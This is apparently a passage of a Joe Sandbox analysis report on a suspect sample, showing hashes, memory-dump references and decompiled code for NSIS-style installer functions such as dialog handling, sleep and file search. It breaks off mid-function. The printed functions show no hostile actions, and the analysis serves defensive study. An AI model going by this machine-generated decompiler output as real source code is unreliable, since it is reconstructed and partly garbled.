Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 00404485 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404485(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x423704, _a4); // executed
				return _t2;
			}

0x0040448f
0x00404495

APIs

KiUserCallbackDispatcher.NTDLL(?,0040425C), ref: 0040448F

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
Instruction ID: c8b2e0b7737fb6f3a2012ed53d18a955e8c044ab00f5fdb14f1eccf879f4c073
Opcode Fuzzy Hash: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
Instruction Fuzzy Hash: 6FA001B6604500ABDE129FA1EF09D0ABF72EBA4702B418579E28590034CB364961EF1D

Uniqueness

Uniqueness Score: -1.00%

Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004014D7(intOrPtr __edx) {
				long _t3;
				void* _t7;
				intOrPtr _t10;
				void* _t13;

				_t10 = __edx;
				_t3 = E00402D84(_t7);
				 *((intOrPtr*)(_t13 - 0x10)) = _t10;
				if(_t3 <= 1) {
					_t3 = 1;
				}
				Sleep(_t3); // executed
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}

0x004014d7
0x004014d8
0x004014e1
0x004014e4
0x004014e8
0x004014e8
0x004014ea
0x00402c2d
0x00402c39

APIs

Sleep.KERNELBASE(00000000), ref: 004014EA

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 69496f19bc6ab9971bad014e7fdfb58ea689034bd31df4dea0a06c0f69c6c777
Instruction ID: 13549e56dd5f321cd39d4a1c5d69ee1d893e1909e6cc3dd33a15c81121e8da7c
Opcode Fuzzy Hash: 69496f19bc6ab9971bad014e7fdfb58ea689034bd31df4dea0a06c0f69c6c777
Instruction Fuzzy Hash: 7CD05E73A141018BD714EBB8BE8545E73A8EB503193208837D402E1191E67888564618

Uniqueness

Uniqueness Score: -1.00%

Function 733312BB Relevance: 1.3, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E733312BB() {
				void* _t3;

				_t3 = GlobalAlloc(0x40,  *0x7333506c +  *0x7333506c); // executed
				return _t3;
			}

0x733312c5
0x733312cb

APIs

GlobalAlloc.KERNELBASE(00000040,?,733312DB,?,7333137F,00000019,733311CA,-000000A0), ref: 733312C5

Memory Dump Source

Source File: 00000000.00000002.773267858.0000000073331000.00000020.00000001.01000000.00000005.sdmp, Offset: 73330000, based on PE: true

Associated: 00000000.00000002.773256620.0000000073330000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.773280632.0000000073334000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.773288025.0000000073336000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73330000_3GJ6S3Kwnb.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 854e26a3a901b33ae791cffe2e7a8cc391423e9e4ac00ea7bd103c9427d25efd
Instruction ID: 55630463a7ee9ae09fed2a34b39d552fc5460e62754654ac2b58c8dd01d4b16f
Opcode Fuzzy Hash: 854e26a3a901b33ae791cffe2e7a8cc391423e9e4ac00ea7bd103c9427d25efd
Instruction Fuzzy Hash: 07B012B2B00000DFFE10AB65CC06F74365CE700301F14C000F608C0180C12948008534

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E0040644E( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E00406507();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x00402923
0x0040293e
0x00402949
0x0040294a
0x00402a94
0x00402925
0x00402928
0x0040292b
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 8b7112dacf42823d7a0a51554599ee8fcdfbe73af1dc861e8dae23c867b5cefb
Instruction ID: 26775ad4c1080374fb75430f90045566014d5e2c4dab898babe53efe7e17598a
Opcode Fuzzy Hash: 8b7112dacf42823d7a0a51554599ee8fcdfbe73af1dc861e8dae23c867b5cefb
Instruction Fuzzy Hash: F3F08271A04104EFD701DBA4DD49AAEB378FF14314F60417BE101F21D0E7B88E129B2A

Uniqueness

Uniqueness Score: -1.00%

Function 00404ED0 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00404ED0(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x42a248;
				_v28 =  *0x42a230 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x42a239 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404E1E(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x42a238) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x4236ec;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x423700;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x4236ec = 0;
								 *0x423700 = 0;
								 *0x42a280 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42a239 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404E9E();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x423700;
									_t201 =  *0x42a248;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42a24c <= 0) {
										L86:
										if( *0x42a2de == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x4291fc + 0x10)) != 0) {
											E00404DD9(0x3ff, 0xfffffffb, E00404DF1(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x42a24c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x423700);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x42a280 = _t291;
					 *0x423700 = GlobalAlloc(0x40,  *0x42a24c << 2);
					_t258 = LoadImageW( *0x42a220, 0x6e, 0, 0, 0, 0);
					 *0x4236f4 =  *0x4236f4 | 0xffffffff;
					_t297 = _t258;
					 *0x4236fc = SetWindowLongW(_v8, 0xfffffffc, E004054DD);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x4236ec = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x4236ec);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E00406544(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E00404463(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E00404463(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x42a24c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x423700 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x423700 + _t300 * 4) = _t284;
									_v16 =  *( *0x423700 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x42a24c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E00404498(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00404498(_v12);
								L93:
								return E004044CA(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404ed7
0x00404ef0
0x00404ef5
0x00404efd
0x00404f03
0x00404f19
0x00404f1c
0x00405147
0x0040514e
0x00405162
0x00405150
0x00405152
0x00405155
0x00405156
0x0040515d
0x0040515d
0x0040516e
0x0040517c
0x0040517f
0x00405195
0x0040520a
0x0040520d
0x0040520f
0x00405219
0x00405227
0x00405227
0x00405229
0x00405233
0x00405239
0x0040523c
0x0040523f
0x0040525a
0x00405241
0x0040524b
0x0040524b
0x0040523f
0x00405233
0x00000000
0x0040520d
0x0040519a
0x004051a5
0x004051aa
0x004051b1
0x004051b6
0x004051ba
0x004051c5
0x004051c5
0x004051c9
0x004051cd
0x004051d1
0x004051e4
0x004051d3
0x004051d3
0x004051da
0x004051e0
0x004051dc
0x004051dc
0x004051dc
0x004051da
0x004051e8
0x004051ea
0x004051fd
0x00405200
0x00405203
0x00405203
0x004051cd
0x00000000
0x004051ba
0x0040519c
0x004051a3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040525d
0x0040525d
0x00405264
0x004052d5
0x004052dd
0x004052e5
0x004052e5
0x004052ee
0x004052f0
0x004052f7
0x004052fa
0x004052fa
0x00405300
0x00405307
0x0040530a
0x0040530a
0x00405310
0x00405316
0x0040531c
0x0040531c
0x00405329
0x0040548a
0x00405491
0x004054ae
0x004054b4
0x004054c6
0x004054c6
0x00000000
0x0040532f
0x00405331
0x00405336
0x0040533b
0x00405340
0x00405342
0x00405342
0x00405343
0x00405344
0x00405346
0x00405346
0x0040534e
0x0040538f
0x00405391
0x004053a1
0x004053a4
0x004053a9
0x004053b0
0x004053b3
0x00405455
0x0040545e
0x00405466
0x00405466
0x00405474
0x00405485
0x00405485
0x00000000
0x00405474
0x004053b9
0x004053bc
0x004053c2
0x004053c7
0x004053c9
0x004053cb
0x004053d1
0x004053d8
0x004053dd
0x004053e4
0x004053e7
0x004053e7
0x004053ee
0x004053fa
0x004053fe
0x00405400
0x00405400
0x004053f0
0x004053f2
0x004053f2
0x00405420
0x0040542c
0x0040543b
0x0040543b
0x0040543d
0x00405440
0x00405449
0x00000000
0x00405350
0x0040535b
0x0040535e
0x00405363
0x00405365
0x00405369
0x00405379
0x00405383
0x00405385
0x00405388
0x00000000
0x00000000
0x00000000
0x00000000
0x0040536b
0x0040536b
0x00405371
0x00405373
0x00405373
0x00405374
0x00405375
0x00000000
0x0040536b
0x0040534e
0x00405329
0x0040526c
0x00000000
0x00405282
0x0040528c
0x00405291
0x00000000
0x00000000
0x004052a3
0x004052a8
0x004052b4
0x004052b4
0x004052b6
0x004052c5
0x004052c7
0x004052cb
0x004052ce
0x00000000
0x004052ce
0x0040526c
0x00404f22
0x00404f27
0x00404f30
0x00404f37
0x00404f49
0x00404f54
0x00404f5a
0x00404f68
0x00404f7c
0x00404f81
0x00404f8e
0x00404f93
0x00404fa9
0x00404fba
0x00404fc7
0x00404fc7
0x00404fca
0x00404fd0
0x00404fd2
0x00404fd5
0x00404fda
0x00404fdf
0x00404fe1
0x00404fe1
0x00405001
0x00405001
0x00405003
0x00405004
0x00405009
0x0040500f
0x00405013
0x00405018
0x00405020
0x00405024
0x00405029
0x0040502e
0x00405036
0x00405039
0x00405109
0x0040511c
0x00000000
0x0040503f
0x00405042
0x00405045
0x00405048
0x00405048
0x0040504e
0x00405057
0x0040505a
0x0040505e
0x00405061
0x00405064
0x0040506d
0x00405076
0x00405079
0x0040507c
0x0040507f
0x004050bd
0x004050e8
0x004050bf
0x004050ce
0x004050ce
0x00405081
0x00405084
0x00405092
0x0040509c
0x004050a4
0x004050ab
0x004050b6
0x004050b6
0x0040507f
0x004050ee
0x004050ef
0x004050fb
0x004050fb
0x00405107
0x00405122
0x00405125
0x00405142
0x00000000
0x00405127
0x0040512c
0x00405135
0x004054c8
0x004054da
0x004054da
0x00405125
0x00000000
0x00405107
0x00405039

APIs

GetDlgItem.USER32 ref: 00404EE8
GetDlgItem.USER32 ref: 00404EF3
GlobalAlloc.KERNEL32(00000040,?), ref: 00404F3D
LoadImageW.USER32 ref: 00404F54
SetWindowLongW.USER32(?,000000FC,004054DD), ref: 00404F6D
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404F81
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404F93
SendMessageW.USER32(?,00001109,00000002), ref: 00404FA9
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FB5
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FC7
DeleteObject.GDI32(00000000), ref: 00404FCA
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404FF5
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405001
SendMessageW.USER32(?,00001132,00000000,?), ref: 0040509C
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 004050CC

Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6

SendMessageW.USER32(?,00001132,00000000,?), ref: 004050E0
GetWindowLongW.USER32(?,000000F0), ref: 0040510E
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040511C
ShowWindow.USER32(?,00000005), ref: 0040512C
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405227
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040528C
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052A1
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052C5
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004052E5
ImageList_Destroy.COMCTL32(?), ref: 004052FA
GlobalFree.KERNEL32 ref: 0040530A
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405383
SendMessageW.USER32(?,00001102,?,?), ref: 0040542C
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040543B
InvalidateRect.USER32(?,00000000,00000001), ref: 00405466
ShowWindow.USER32(?,00000000), ref: 004054B4
GetDlgItem.USER32 ref: 004054BF
ShowWindow.USER32(00000000), ref: 004054C6

Strings

N, xrefs: 00405165
M, xrefs: 00405084
, xrefs: 0040549E

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 8525e20a0051abda158ee0026944c2010c5087461c76e87d86fd24a5c04b36c4
Instruction ID: f25f8d73efcf6ba6a17deb726488d783a00b9a1a7703c2d4830b1b44d3514242
Opcode Fuzzy Hash: 8525e20a0051abda158ee0026944c2010c5087461c76e87d86fd24a5c04b36c4
Instruction Fuzzy Hash: 34027D70A00609EFDB20DF95CC45AAF7BB5FB84315F10817AE910BA2E1D7798A52CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404622 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00404622(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				intOrPtr _t69;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x4216d4 =  *0x4216d4 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E004044CA(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x4281c0;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E004048D1(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a228, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a228, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x4216d4 != 0) {
						goto L27;
					} else {
						_t69 =  *0x4226e0; // 0x80bc74
						_t29 = _t69 + 0x14; // 0x80bc88
						_t116 = _t29;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
